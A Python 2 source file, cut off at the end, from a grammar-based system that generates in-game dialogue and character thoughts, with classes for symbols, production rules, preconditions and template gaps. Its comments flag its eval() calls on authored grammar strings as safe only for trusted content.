def _target_production_rule(self, rule, state, rule_evaluation_metric, n_tabs, retracing_chains=False):
"""Attempt to terminally expand this rule's head."""
if self.debug:
if rule.viable:
print "{}Retracing our chains via rule {}".format(' '*n_tabs, rule)
else:
print "{}Targeting production rule {}...".format(' '*n_tabs, rule)
terminally_expanded_symbols_in_this_rule_body = []
for symbol in rule.body:
if type(symbol) == unicode: # Terminal symbol (no need to expand)
terminally_expanded_symbols_in_this_rule_body.append(symbol)
elif symbol.expansion and not retracing_chains:
# Nonterminal symbol that we already successfully expanded earlier
return symbol.expansion
else: # Nonterminal symbol that we have not yet successfully expanded
terminal_expansion_of_that_symbol = self._forward_chain_from_symbol(
symbol=symbol, state=state, retracing_chains=retracing_chains,
rule_evaluation_metric=rule_evaluation_metric, n_tabs=n_tabs+1
)
if terminal_expansion_of_that_symbol:
if retracing_chains:
self.symbols_expanded_to_produce_the_terminal_derivation.add(symbol)
if self.debug:
print "{}Traversed through symbol {}".format(' '*n_tabs, symbol)
terminally_expanded_symbols_in_this_rule_body.append(terminal_expansion_of_that_symbol)
else:
if self.debug:
print "{}Abandoning production rule {}".format(' '*n_tabs, rule)
return None
# You successfully expanded all the symbols in this rule body
rule.viable = True
expansion_yielded_by_this_rule = ''.join(terminally_expanded_symbols_in_this_rule_body)
return expansion_yielded_by_this_rule
def _probabilistically_sort_production_rules(self, rules, rule_evaluation_metric):
"""Sort a collection of production rules probabilistically by utilizing their application rates.
Because the application rates of a group of rules are only relative to one another
if those rules have the same head (which is not a guarantee when backward chaining),
we need to probabilistically sort rules within rule-head groups first, and then we really
have no viable option except randomly shuffling the head groups (while retaining the
probabilistically determined orderings within each head group)
"""
# Now produce a probabilistic sorting of all remaining rules
probabilistic_sort = []
# Assemble all the rule heads
rule_heads = list({rule.head for rule in rules})
# Randomly shuffle the rule heads (we have no way deciding how to order the
# rule-head groups, since the application rates of rules in different groups
# only mean anything relative to the other rules in that same group, not to
# rules in other groups)
random.shuffle(rule_heads)
# Probabilistically sort each head group
for head in rule_heads:
rules_sharing_this_head = [rule for rule in rules if rule.head is head]
probabilistic_sort_of_this_head_group = self._probabilistically_sort_a_rule_head_group(
rules=rules_sharing_this_head, rule_evaluation_metric=rule_evaluation_metric
)
probabilistic_sort += probabilistic_sort_of_this_head_group
return probabilistic_sort
def _probabilistically_sort_a_rule_head_group(self, rules, rule_evaluation_metric):
"""Probabilistically sort a collection of production rules that share the same rule head.
This method works by fitting a probability range to each of the given set of rules, rolling
a random number and selecting the rule whose range it falls within, and then repeating this
on the set of remaining rules, and so forth until every rule has been selecting.
"""
# Now, probabilistically sort all rules that are currently executable
probabilistic_sort = []
remaining_rules = list(rules)
while len(remaining_rules) > 1:
probability_ranges = self._fit_probability_distribution_to_rules_according_to_an_evaluation_metric(
rules=remaining_rules, rule_evaluation_metric=rule_evaluation_metric
)
x = random.random()
probabilistically_selected_rule = next(
rule for rule in remaining_rules if probability_ranges[rule][0] <= x <= probability_ranges[rule][1]
)
probabilistic_sort.append(probabilistically_selected_rule)
remaining_rules.remove(probabilistically_selected_rule)
# Add the only rule that's left (no need to fit a probability distribution to
# this set containing just one rule)
last_one_to_be_selected = remaining_rules[0]
probabilistic_sort.append(last_one_to_be_selected)
return probabilistic_sort
@staticmethod
def _fit_probability_distribution_to_rules_according_to_an_evaluation_metric(rules, rule_evaluation_metric):
"""Return a dictionary mapping each of the rules to a probability range.
@param rules: The rules that this method will fit a probability distribution to.
"""
# Determine the individual probabilities of each production rule, given our
# rule evaluation metric
individual_probabilities = {}
sum_of_all_scores = float(sum(rule_evaluation_metric(rule) for rule in rules))
for rule in rules:
probability = rule_evaluation_metric(rule)/sum_of_all_scores
individual_probabilities[rule] = probability
# Use those individual probabilities to associate each production rule with a specific
# probability range, such that generating a random value between 0.0 and 1.0 will fall
# into one and only one production rule's probability range
probability_ranges = {}
current_bound = 0.0
for rule in rules:
probability = individual_probabilities[rule]
probability_range_for_this_rule = (current_bound, current_bound+probability)
probability_ranges[rule] = probability_range_for_this_rule
current_bound += probability
# Make sure the last bound indeed extends to 1.0 (necessary because of
# float rounding issues)
last_rule_to_have_a_range_attributed = rules[-1]
probability_ranges[last_rule_to_have_a_range_attributed] = (
probability_ranges[last_rule_to_have_a_range_attributed][0], 1.0
)
return probability_ranges
def _reset_temporary_attributes(self):
"""Clear all temporary symbol and rule attributes that we set during this generation session."""
for symbol in self.nonterminal_symbols:
symbol.expansion = None
for rule in symbol.production_rules:
rule.viable = False
self.symbols_expanded_to_produce_the_terminal_derivation = set()
def find_symbol(self, symbol_name):
"""Return a symbol with the given name."""
try:
return next(s for s in self.nonterminal_symbols if s.tag == symbol_name)
except StopIteration:
print "I could not find a symbol with that name."
class NonterminalSymbol(object):
    """A symbol in a production system for in-game dialogue generation."""

    def __init__(self, tag, top_level, raw_markup, production_rules_specification):
        """Initialize a NonterminalSymbol object.

        @param tag: The name of this symbol, as authored in Expressionist.
        @param top_level: Whether a terminal expansion of this symbol constitutes a
                          complete line of dialogue.
        @param raw_markup: The raw annotations attributed to this symbol.
        @param production_rules_specification: Specifications for the rules expanding this symbol.
        """
        self.tag = tag
        self.top_level = top_level
        # Reify production rules for expanding this symbol
        self.production_rules = self._init_reify_production_rules(production_rules_specification)
        # Annotation set populated (as appropriate) by _init_parse_markup()
        self.preconditions = set()
        # Chaining bookkeeping used during live template generation; populated by
        # Productionist._init_attribute_backward_chaining_and_forward_chaining_rules_to_symbols()
        self.backward_chaining_rules = []
        self.forward_chaining_rules = []
        # Caches a successful expansion of this symbol during a generation procedure,
        # so that two rules sharing this symbol in their bodies don't duplicate work
        self.expansion = None
        # Parse markup last, once the annotation sets exist
        self._init_parse_markup(raw_markup=raw_markup)

    def __str__(self):
        """Return string representation."""
        return '[[{}]]'.format(self.tag)

    def _init_reify_production_rules(self, production_rules_specification):
        """Instantiate ProductionRule objects for the rules specified in production_rules_specification."""
        return [
            ProductionRule(
                head=self,
                body_specification=specification['expansion'],
                application_rate=specification['app_rate']
            )
            for specification in production_rules_specification
        ]

    def _init_parse_markup(self, raw_markup):
        """This method gets overwritten by subclasses to this class."""
        pass
class ProductionRule(object):
    """A production rule in a production system for in-game dialogue generation."""

    def __init__(self, head, body_specification, application_rate):
        """Initialize a ProductionRule object.

        'head' is a nonterminal symbol constituting the left-hand side of this rule, while
        'body' is a sequence of symbols that this rule may be used to expand the head into.
        """
        self.head = head
        # Resolved later by Productionist._init_resolve_symbol_references_in_a_rule_body()
        self.body = None
        self.body_specification = body_specification
        self.body_specification_str = ''.join(body_specification)
        self.application_rate = application_rate
        # Marks whether this rule fired on a successful chain during a generation
        # procedure; after terminal backward- and forward-chaining succeed, the
        # rules flagged here are retraced to construct the final dialogue template
        self.viable = False

    def __str__(self):
        """Return string representation."""
        return '{head} --> {body}'.format(head=self.head, body=self.body_specification_str)
class Condition(object):
    """A condition super class that is inherited from by Precondition and ViolationCondition."""

    def __init__(self, condition):
        """Initialize a Condition object.

        @param condition: A string holding a Python lambda expression, e.g.
                          "lambda speaker: speaker.player"; it is reified into a
                          callable and its argument names are recorded.
        """
        self.condition = condition
        # NOTE: eval() of authored grammar content -- acceptable only because grammar
        # files are trusted first-party data; never pass untrusted input here
        self.test = eval(condition)  # The condition is literally a lambda function
        self.arguments = self._init_parse_condition_for_its_arguments(condition=condition)

    @staticmethod
    def _init_parse_condition_for_its_arguments(condition):
        """Parse this condition's specification (a lambda function) to gather the arguments that it requires."""
        index_of_end_of_arguments = condition.index(':')
        arguments = condition[:index_of_end_of_arguments]
        arguments = arguments[len('lambda '):]  # Excise 'lambda ' prefix
        arguments = arguments.split(', ')
        return arguments

    def evaluate(self, state):
        """Evaluate this condition given the state of the world at the beginning of a conversation turn.

        @param state: A Conversation object (dialogue generation) or a Person/PersonExNihilo
                      object (thought generation), duck-typed by class name below.
        """
        # Use duck typing to check for whether this state capsule is a Conversation
        # object (in the case of dialogue generation) or a Person object (in the case
        # of thought generation). (BUG FIX: the original compared class names with 'is',
        # which relies on CPython string interning; '==' is the correct comparison.)
        if state.__class__.__name__ == 'Conversation':
            # If the current speaker is a human player, don't even worry about
            # evaluating preconditions, i.e., let them say whatever
            if state.speaker.player:
                return True
            # Bind the local variables that the eval() calls below resolve when
            # realizing this condition's arguments (these names are referenced
            # indirectly via eval, so they look unused to linters -- do not rename)
            conversation = state
            speaker = state.speaker
            interlocutor = state.interlocutor
            subject = state.subject.matches[state.speaker]
        elif state.__class__.__name__ in ('Person', 'PersonExNihilo'):
            thinker = state
        # Prepare the list of arguments by evaluating to bind them to the needed local variables
        realized_arguments = [eval(argument) for argument in self.arguments]
        # Return a boolean indicating whether this precondition is satisfied
        try:
            return self.test(*realized_arguments)
        except (ValueError, AttributeError):
            raise Exception('Cannot evaluate the precondition {}'.format(self.condition))
class Precondition(Condition):
    """A precondition for expanding a symbol to generate a line of dialogue."""

    def __init__(self, tag):
        """Initialize a Precondition object.

        @param tag: The authored lambda-expression string for this precondition.
        """
        super(Precondition, self).__init__(condition=tag)

    def __str__(self):
        """Return a string specifying the lambda function itself."""
        return self.condition
class StaticElement(object):
    """A static (fixed-text) element in a templated terminal derivation."""

    def __init__(self, text):
        """Initialize a StaticElement object.

        @param text: The fixed text of this element.
        """
        self.text = text

    def __str__(self):
        """Return the text of this static element."""
        return self.text

    def realize(self, state):
        """Realize this element; the state is irrelevant, since the text is fixed."""
        return self.text
class Gap(object):
    """A gap in a templated terminal derivation."""

    def __init__(self, specification):
        """Initialize a Gap object.

        @param specification: A Python expression (as a string) that, when evaluated
                              against the conversational state, yields the text that
                              fills in this gap.
        """
        self.specification = specification

    def __str__(self):
        """Return the specification for filling in this gap."""
        return self.specification

    def realize(self, state):
        """Fill in this gap according to the world state during a conversation turn."""
        # Use duck typing to check whether this state capsule is a Conversation object
        # (dialogue generation) or a Person object (thought generation); then bind the
        # local variables that self.specification may reference when evaluated below
        # (they look unused to linters, but eval resolves them -- do not rename).
        # (BUG FIX: the original compared class names with 'is', which relies on
        # CPython string interning; '==' is the correct comparison.)
        if state.__class__.__name__ == 'Conversation':
            conversation, speaker, interlocutor, subject = (
                state,
                state.speaker, state.interlocutor,
                state.subject.matches[state.speaker]
            )
        elif state.__class__.__name__ in ('Person', 'PersonExNihilo'):
            thinker = state
        # NOTE: eval() of an authored specification -- acceptable only because grammar
        # files are trusted first-party data; never feed untrusted input here
        return str(eval(self.specification))
class DialogueGenerator(Productionist):
    """A subclass to Productionist that handles dialogue-specific concerns.
    For instance, this class affords the targeting of a generated line performing a
    specific dialogue move or addressing a specific topic of conversation.
    """

    def __init__(self, game):
        """Initialize a DialogueGenerator object."""
        super(DialogueGenerator, self).__init__(game)

    def target_dialogue_move(self, conversation, move_name):
        """Attempt to generate a line of dialogue that performs a dialogue move with the given name.

        @param conversation: The conversation in which the requested generated line will be delivered.
        @param move_name: The name of the dialogue move the generated line should perform.
        """
        return self._generate_line_with_markup(
            conversation=conversation,
            markup_lambda_expression=lambda symbol: move_name in symbol.moves
        )

    def target_topics_of_conversation(self, conversation, topic_names):
        """Attempt to generate a line of dialogue that addresses a topic with the given name.

        @param conversation: The conversation in which the requested generated line will be delivered.
        @param topic_names: A set of names of topics of conversation, at least one of which the
                            requested generated line should address.
        """
        return self._generate_line_with_markup(
            conversation=conversation,
            markup_lambda_expression=lambda symbol: topic_names & symbol.topics_addressed
        )

    def _generate_line_with_markup(self, conversation, markup_lambda_expression):
        """Target a raw derivation with the given markup and reify it as a LineOfDialogue object.

        Shared implementation of target_dialogue_move() and target_topics_of_conversation(),
        which previously duplicated this entire procedure.
        """
        # Attempt to produce a raw derivation with the desired markup
        raw_derivation_built_by_targeting_this_symbol = self.target_markup(
            markup_lambda_expression=markup_lambda_expression,
            symbol_sort_evaluation_function=lambda symbol: random.random(),
            state=conversation, rule_evaluation_metric=lambda rule: rule.application_rate
        )
        # Reify the template as a LineOfDialogue object and return that
        line_of_dialogue_object = LineOfDialogue(
            raw_template=raw_derivation_built_by_targeting_this_symbol,
            symbols_expanded_to_produce_this_template=self.symbols_expanded_to_produce_the_terminal_derivation,
            conversation=conversation
        )
        # Reset any temporary attributes that we utilized during this generation procedure
        self._reset_temporary_attributes()
        return line_of_dialogue_object
class DialogueNonterminalSymbol(NonterminalSymbol):
    """A subclass of NonterminalSymbol that pertains specifically to dialogue concerns."""

    def __init__(self, tag, top_level, raw_markup, production_rules_specification):
        """Initialize a DialogueNonterminalSymbol object."""
        # These annotation sets are populated by _init_parse_markup(), which the
        # superclass constructor calls last -- so they must exist before super().__init__
        self.conditional_violations = set()
        self.propositions = set()
        self.moves = set()  # The dialogue moves constituted by the delivery of this line
        self.speaker_obligations_pushed = set()  # Line asserts speaker conversational obligations
        self.interlocutor_obligations_pushed = set()  # Line asserts interlocutor conversational obligations
        self.topics_pushed = set()  # Line introduces a new topic of conversation
        self.topics_addressed = set()  # Line addresses a topic of conversation
        self.clear_subject_of_conversation = False  # Line clears subject of conversation to allow asserting a new one
        self.force_speaker_subject_match_to_speaker_preoccupation = False  # Line forces a speaker subject match
        self.context_updates = set()  # Line updates the conversational context, e.g., w.r.t. subject of conversation
        super(DialogueNonterminalSymbol, self).__init__(tag, top_level, raw_markup, production_rules_specification)

    def _init_parse_markup(self, raw_markup):
        """Instantiate and attribute objects for the annotations attributed to this symbol.

        @param raw_markup: A mapping from tagset name to an iterable of tags in that tagset.
        """
        for tagset in raw_markup:
            for tag in raw_markup[tagset]:
                if tagset == "Preconditions":
                    self.preconditions.add(Precondition(tag=tag))
                elif tagset == "ViolationConditions":
                    self.conditional_violations.add(ConditionalViolation(tag=tag))
                elif tagset == "Propositions":
                    self.propositions.add(tag)
                # Acts, goals, obligations, and topics are reified as objects during a conversation, but
                # here are only represented as a tag
                elif tagset == "Moves":
                    self.moves.add(tag)
                elif tagset == "PushObligation":  # Obligations pushed onto interlocutor
                    self.interlocutor_obligations_pushed.add(tag)
                elif tagset == "PushSpeakerObligation":  # Obligations pushed onto speaker (by their own line)
                    self.speaker_obligations_pushed.add(tag)
                elif tagset == "PushTopic":
                    self.topics_pushed.add(tag)
                elif tagset == "AddressTopic":
                    self.topics_addressed.add(tag)
                elif tagset == "Context":
                    # NOTE(review): the first branch is a plain 'if', so a
                    # "CLEAR SUBJECT" tag also falls through into the 'elif tag'
                    # branch below and gets added to context_updates -- confirm
                    # whether that double-handling is intentional
                    if tag == "CLEAR SUBJECT":
                        self.clear_subject_of_conversation = True
                    if tag == "FORCE SPEAKER SUBJECT MATCH TO SPEAKER PREOCCUPATION":
                        self.force_speaker_subject_match_to_speaker_preoccupation = True
                    elif tag:
                        self.context_updates.add(tag)
                elif tagset == "EffectConditions":
                    pass  # TODO
                elif tagset == "ChangeSubjectTo":
                    pass  # TODO REMOVE THIS TAGSET
                elif tagset == "UserStudyQueryArguments":
                    pass  # This one is currently only used for producing training data
                else:
                    raise Exception('Unknown tagset encountered: {}'.format(tagset))

    @property
    def all_markup(self):
        """Return all the annotations attributed to this symbol."""
        all_markup = (
            self.preconditions | self.conditional_violations | self.propositions |
            self.context_updates | self.moves | self.speaker_obligations_pushed |
            self.interlocutor_obligations_pushed | self.topics_pushed | self.topics_addressed
        )
        return list(all_markup)

    def currently_violated(self, state):
        """Return whether this symbol is currently violated, i.e., whether it has an unsatisfied
        precondition or would incur a conversational violation if deployed at this time."""
        if state.speaker.player:  # Let the player say anything currently, i.e., return False
            return False
        if (self.conversational_violations(conversation=state) or
                not self.preconditions_satisfied(conversation=state)):
            if state.productionist.debug:
                # Express why the symbol is currently violated
                print "Symbol {} is currently violated".format(self)
                conversational_violations = self.conversational_violations(conversation=state)
                for conversational_violation in conversational_violations:
                    print '\t{}'.format(conversational_violation)
                unsatisfied_preconditions = (
                    p for p in self.preconditions if p.evaluate(state=state) is False
                )
                for unsatisfied_precondition in unsatisfied_preconditions:
                    print '\t{}'.format(unsatisfied_precondition)
            return True
        # Symbol is not currently violated, so return False
        return False

    def preconditions_satisfied(self, conversation):
        """Return whether this line's preconditions are satisfied given the state of the world."""
        return all(precondition.evaluate(state=conversation) for precondition in self.preconditions)

    def conversational_violations(self, conversation):
        """Return a list of names of conversational violations that will be incurred if this line is deployed now."""
        violations_incurred = [
            potential_violation.name for potential_violation in self.conditional_violations if
            potential_violation.evaluate(state=conversation)
        ]
        return violations_incurred
class LineOfDialogue(object):
    """A line of dialogue that may be used during a conversation."""

    def __init__(self, raw_template, symbols_expanded_to_produce_this_template, conversation):
        """Initialize a LineOfDialogue object.

        Parameters:
            raw_template: the raw templated string specifying this line.
            symbols_expanded_to_produce_this_template: the nonterminal symbols
                whose expansion produced this template; their markup is
                inherited by this line below.
            conversation: the current conversation, used to evaluate which
                conversational violations this line would incur right now.
        """
        self.raw_template = raw_template
        self.nonterminal_symbols = symbols_expanded_to_produce_this_template
        self.template = self._init_prepare_template(raw_line=raw_template)
        # Prepare annotation attributes
        self.conversational_violations = set()
        self.propositions = set()
        self.moves = set()  # The dialogue moves constituted by the delivery of this line
        self.speaker_obligations_pushed = set()  # Line asserts speaker conversational obligations
        self.interlocutor_obligations_pushed = set()  # Line asserts interlocutor conversational obligations
        self.topics_pushed = set()  # Line introduces a new topic of conversation
        self.topics_addressed = set()  # Line addresses a topic of conversation
        self.clear_subject_of_conversation = False  # Line clears subject of conversation to allow asserting a new one
        self.force_speaker_subject_match_to_speaker_preoccupation = False  # Line forces a speaker subject match
        self.context_updates = set()  # Line updates the conversational context, e.g., the subject of conversation
        self._init_inherit_markup(conversation=conversation)

    def __str__(self):
        """Return the raw template characterizing this line of dialogue."""
        return self.raw_template

    @staticmethod
    def _init_prepare_template(raw_line):
        """Prepare a templated line of dialogue from a raw specification for one.

        The template returned by this method will specifically be an ordered list
        of StaticElement and Gap objects, the latter of which will be filled in
        at realization time: bracketed spans '[...]' become Gaps, the text
        between them becomes StaticElements.
        """
        template = []  # An ordered list of StaticElements and Gaps
        while '[' in raw_line:
            index_of_opening_bracket = raw_line.index('[')
            # Process next static element
            next_static_element = raw_line[:index_of_opening_bracket]
            if next_static_element:
                template.append(StaticElement(text=next_static_element))
            # Process next gap
            index_of_closing_bracket = raw_line.index(']')
            next_gap = raw_line[index_of_opening_bracket+1:index_of_closing_bracket]
            template.append(Gap(specification=next_gap))
            # Excise the processed elements
            raw_line = raw_line[index_of_closing_bracket+1:]
        # Process the trailing static element, if any
        if raw_line:
            template.append(StaticElement(text=raw_line))
        return template

    def _init_inherit_markup(self, conversation):
        """Inherit the mark-up of all the symbols that were expanded in the construction of this dialogue template."""
        for symbol in self.nonterminal_symbols:
            self.conversational_violations |= set(symbol.conversational_violations(conversation=conversation))
            self.propositions |= symbol.propositions
            self.moves |= symbol.moves
            self.speaker_obligations_pushed |= symbol.speaker_obligations_pushed
            self.interlocutor_obligations_pushed |= symbol.interlocutor_obligations_pushed
            self.topics_pushed |= symbol.topics_pushed
            self.topics_addressed |= symbol.topics_addressed
            # NOTE(review): plain assignment (not an accumulating update), so the
            # *last* symbol iterated wins for these two flags — confirm intended.
            self.clear_subject_of_conversation = symbol.clear_subject_of_conversation
            self.force_speaker_subject_match_to_speaker_preoccupation = (
                symbol.force_speaker_subject_match_to_speaker_preoccupation
            )
            self.context_updates |= symbol.context_updates

    def realize(self, conversation):
        """Return a filled-in template according to the world state during the current conversation turn."""
        return ''.join(element.realize(state=conversation) for element in self.template)
class ConditionalViolation(Condition):
    """A conversational violation that may be incurred, pending the evaluation of its conditions,
    if a symbol is expanded to generate a line of dialogue.
    """

    def __init__(self, tag):
        """Parse a 'name<--condition' annotation tag and initialize the underlying Condition."""
        # Annotation format: '<violation name><--<condition expression>'.
        violation_name, condition_expression = tag.split('<--')
        self.name = violation_name
        super(ConditionalViolation, self).__init__(condition=condition_expression)

    def __str__(self):
        """Return string representation."""
        return '{name} <-- {condition}'.format(name=self.name, condition=self.condition)
###################
# THOUGHT CLASSES #
###################
class ThoughtGenerator(Productionist):
    """A subclass to Productionist that handles thought-specific concerns.

    For instance, this class affords the targeting of a generated thought that is elicited
    by a set of symbol stimuli encountered by a character going about the world.

    NOTE: this module targets Python 2 (print statements, dict.iteritems()).
    """

    def __init__(self, game):
        """Initialize a ThoughtGenerator object."""
        # These are set as needed by target_association() to hold temporary information
        self.thinker = None
        self.stimuli = {}
        self.nonrepeatable_symbols = set()
        super(ThoughtGenerator, self).__init__(game)

    def target_association(self, thinker, stimuli):
        """Attempt to generate a thought associated with the given weighted stimuli.

        Parameters:
            thinker: the character in whose mind the thought is generated.
            stimuli: a dict mapping signal names to strength weights.

        Returns:
            A Thought object reifying the generated template.
        """
        if self.debug:
            print "Attempting to elicit thought given the stimuli: {stimuli}...".format(
                stimuli=', '.join("{signal} ({strength})".format(
                    signal=signal, strength=strength) for signal, strength in stimuli.iteritems()
                )
            )
        self.thinker = thinker
        self.stimuli = stimuli
        self.nonrepeatable_symbols = self._collect_nonrepeatable_symbols()
        # A symbol matches when it shares at least one signal name with the
        # stimuli (the set intersection's truthiness signals a match).
        markup_lambda_expression = (
            lambda symbol: {pair[0] for pair in symbol.signals} & {pair[0] for pair in self.stimuli.iteritems()}
        )
        # Attempt to produce a raw derivation with the desired markup, i.e., one that has
        # a good matching between the symbols associated with it and the stimuli (i.e., the
        # weighted_symbol_set)
        raw_derivation_built_by_targeting_this_symbol = self.target_markup(
            markup_lambda_expression=markup_lambda_expression,
            symbol_sort_evaluation_function=self.evaluate_nonterminal_symbol,
            state=thinker,
            rule_evaluation_metric=self.evaluate_production_rule
        )
        # Reify the template as a Thought object and return that
        thought_object = Thought(
            raw_template=raw_derivation_built_by_targeting_this_symbol,
            symbols_expanded_to_produce_this_template=self.symbols_expanded_to_produce_the_terminal_derivation,
            thinker=thinker
        )
        # Reset any temporary attributes that we utilized during this generation procedure
        self._reset_temporary_attributes()
        return thought_object

    def _collect_nonrepeatable_symbols(self):
        """Collect all nonterminal symbols that cannot be expanded during this generation instance (because
        that would produce awkward repetition).
        """
        nonrepeatable_symbols_recently_expanded_by_thinker = set()
        for recent_thought in self.thinker.mind.recent_thoughts:
            for symbol in recent_thought.nonterminal_symbols:
                if symbol.nonrepeatable:
                    nonrepeatable_symbols_recently_expanded_by_thinker.add(symbol)
        return nonrepeatable_symbols_recently_expanded_by_thinker

    def evaluate_nonterminal_symbol(self, nonterminal_symbol):
        """Score a nonterminal symbol for the strength of its association with a set of stimuli."""
        config = self.game.config
        score = 0
        for stimulus_signal, stimulus_signal_weight in self.stimuli.iteritems():
            for symbol_signal, _ in nonterminal_symbol.signals:  # _ stands for symbol_signal_weight (now ignored)
                # Reward for matching signals (commensurately to the weight for that
                # signal that is packaged up in the stimuli)
                if stimulus_signal == symbol_signal:
                    score += stimulus_signal_weight
        # Penalize for symbol having already been expanded by this person to
        # produce a recent thought
        if nonterminal_symbol in self.nonrepeatable_symbols:
            score *= config.penalty_multiplier_for_expanding_nonrepeatable_symbol_in_thought
        return score

    def evaluate_production_rule(self, rule):
        """Score a production rule for the strength of its association with a set of stimuli."""
        # Determine the score according to the associational strength of the symbols in its body
        # (unicode entries in the body are terminal text snippets and contribute nothing)
        score = sum(0 if type(s) is unicode else self.evaluate_nonterminal_symbol(s) for s in rule.body)
        # Increment the score according to the rule's application rate (multiplied by the
        # corresponding score multiplier specified in config)
        application_rate_multiplier = self.game.config.application_rate_multiplier_scoring_boost
        score += rule.application_rate * application_rate_multiplier
        return score
class ThoughtNonterminalSymbol(NonterminalSymbol):
    """A subclass of NonterminalSymbol that pertains specifically to thought concerns."""

    def __init__(self, tag, top_level, raw_markup, production_rules_specification):
        """Initialize a ThoughtNonterminalSymbol object."""
        self.signals = []  # A list of (signal, weight) tuples
        self.effects = set()
        self.nonrepeatable = False  # Whether a penalty should be incurred for repeatedly expanding this symbol
        super(ThoughtNonterminalSymbol, self).__init__(tag, top_level, raw_markup, production_rules_specification)

    def _init_parse_markup(self, raw_markup):
        """Instantiate and attribute objects for the annotations attributed to this symbol.

        Parameters:
            raw_markup: a dict mapping tagset names ('Preconditions', 'Signals',
                'Effects', 'nonrepeatable') to iterables of tag strings.

        Raises:
            Exception: when an unrecognized tagset name is encountered.
        """
        for tagset in raw_markup:
            for tag in raw_markup[tagset]:
                if tagset == "Preconditions":
                    self.preconditions.add(Precondition(tag=tag))
                elif tagset == "Signals":
                    # A signal tag is '<signal name> <weight>'; the name itself
                    # may contain spaces, so only the final token is the weight.
                    symbol_and_weight = tag.split()
                    symbol = ' '.join(symbol_and_weight[:-1])
                    weight = symbol_and_weight[-1]
                    weight = float(weight)
                    symbol_weight_tuple = (symbol, weight)
                    self.signals.append(symbol_weight_tuple)
                elif tagset == "Effects":
                    self.effects.add(tag)
                elif tagset == "nonrepeatable":
                    # SECURITY NOTE: eval() on authored content-file data; fine
                    # for trusted local content, unsafe on untrusted input.
                    self.nonrepeatable = eval(tag)
                else:
                    raise Exception('Unknown tagset encountered: {}'.format(tagset))
        # KLUDGE 06-02-2016: IF COLON IS IN A SYMBOL'S NAME (E.G., 'do depart : i hate this town'),
        # INFER IT BEING NONREPEATABLE
        if ':' in self.tag:
            self.nonrepeatable = True

    @property
    def all_markup(self):
        """Return all the annotations attributed to this symbol.

        BUG FIX: self.signals is a *list*, and set | list raises TypeError, so
        this property crashed whenever the symbol had any signal annotations;
        the list is now converted to a set before the union.
        """
        all_markup = self.preconditions | set(self.signals) | self.effects
        return list(all_markup)

    def currently_violated(self, state):
        """Return whether this symbol is currently violated, i.e., whether it has an unsatisfied
        precondition if deployed at this time."""
        return not self.preconditions_satisfied(thinker=state)

    def preconditions_satisfied(self, thinker):
        """Return whether this symbol's preconditions are satisfied given the state of the world."""
        return all(precondition.evaluate(state=thinker) for precondition in self.preconditions)
class Thought(object):
    """A thought that may enter the mind of a character."""

    def __init__(self, raw_template, symbols_expanded_to_produce_this_template, thinker):
        """Initialize a Thought object.

        Parameters:
            raw_template: the raw templated string for this thought.
            symbols_expanded_to_produce_this_template: the nonterminal symbols
                whose expansion produced the template; their markup is
                inherited below.
            thinker: the character in whose mind this thought occurs.
        """
        self.thinker = thinker
        self.raw_template = raw_template
        self.nonterminal_symbols = symbols_expanded_to_produce_this_template
        self.template = self._init_prepare_template(raw_line=raw_template)
        # Prepare annotation attributes
        self.signals = {}  # A dictionary mapping signal names to their strengths
        self.effects = set()
        self._init_inherit_markup()

    def __str__(self):
        """Return string representation."""
        return 'A thought ("{raw_template}"), produced in the mind of {owner}'.format(
            raw_template=self.raw_template,
            owner=self.thinker.name,
            # date=self.thinker.game.date[0].lower() + self.thinker.game.date[1:]
        )

    @staticmethod
    def _init_prepare_template(raw_line):
        """Prepare a templated thought from a raw specification for one.

        The template returned by this method will specifically be an ordered list
        of StaticElement and Gap objects, the latter of which will be filled in
        at realization time: bracketed spans '[...]' become Gaps, the text
        between them becomes StaticElements.
        """
        template = []  # An ordered list of StaticElements and Gaps
        while '[' in raw_line:
            index_of_opening_bracket = raw_line.index('[')
            # Process next static element
            next_static_element = raw_line[:index_of_opening_bracket]
            if next_static_element:
                template.append(StaticElement(text=next_static_element))
            # Process next gap
            index_of_closing_bracket = raw_line.index(']')
            next_gap = raw_line[index_of_opening_bracket+1:index_of_closing_bracket]
            template.append(Gap(specification=next_gap))
            # Excise the processed elements
            raw_line = raw_line[index_of_closing_bracket+1:]
        # Process the trailing static element, if any
        if raw_line:
            template.append(StaticElement(text=raw_line))
        return template

    def _init_inherit_markup(self):
        """Inherit the mark-up of all the symbols that were expanded in the construction of this dialogue template."""
        config = self.thinker.game.config
        for symbol in self.nonterminal_symbols:
            self.effects |= symbol.effects
            for signal, strength in symbol.signals:
                signal = self.evaluate_runtime_signal(signal=signal)
                if signal not in self.signals:
                    self.signals[signal] = 0
                # NOTE: each annotation adds a flat config-specified increment;
                # the per-symbol 'strength' value is currently unused (see the
                # JOR note below).
                self.signals[signal] += config.strength_increase_to_thought_signal_for_nonterminal_signal_annotation
                # JOR 05-17-16: THIS WAS THE ORIGINAL FINAL LINE FOR ACTUALLY TOTALLING UP THE SIGNAL SCORES
                # BY TALLYING THE ANNOTATIONS FOR EACH NONTERMINAL SYMBOL EXPANDED TO PRODUCE THIS THOUGHT
                # self.signals[signal] += strength

    def evaluate_runtime_signal(self, signal):
        """Evaluate a runtime signal, e.g., '[id(thinker.boss)]'.

        SECURITY NOTE: uses eval() on content-authored strings; acceptable for
        trusted local content files, unsafe for untrusted input.
        """
        thinker = self.thinker  # Needed to evaluate the signal, if it's truly a runtime signal
        try:
            return str(eval(signal))
        except (NameError, SyntaxError):  # It's not a runtime variable, but just a regular string, so return that
            return signal

    def realize(self):
        """Return a filled-in template according to the world state during the current conversation turn."""
        raw_realization = ''.join(element.realize(state=self.thinker) for element in self.template)
        return self._postprocess_raw_realization(raw_realization=str(raw_realization))

    @staticmethod
    def _postprocess_raw_realization(raw_realization):
        """Postprocess a raw thought realization to clean up punctuation and capitalization.

        Currently a no-op passthrough; the commented-out implementation below
        is kept for reference.
        """
        # postprocessed_realization = ''
        # sentence_delimiting_punctuation = {'.', '?', '!'}
        # clause_delimiting_punctuation = {',', ';'}
        # to_make_uppercase = set()
        # to_make_lowercase = set()
        # for i, character in enumerate(raw_realization):
        #     if i == 0 or i in to_make_uppercase:
        #         postprocessed_realization += character.upper()
        #     elif i in to_make_lowercase:
        #         postprocessed_realization += character.lower()
        #     else:
        #         postprocessed_realization += character
        #     if character in sentence_delimiting_punctuation:
        #         part_of_ellipsis = (
        #             raw_realization[i] == '.' and
        #             (i != 0 and raw_realization[i-1] == '.' or
        #                 (i < len(raw_realization)-1 and raw_realization[i+1] == '.')
        #             )
        #         )
        #         # Make sure there's whitespace trailing after this punctuation mark
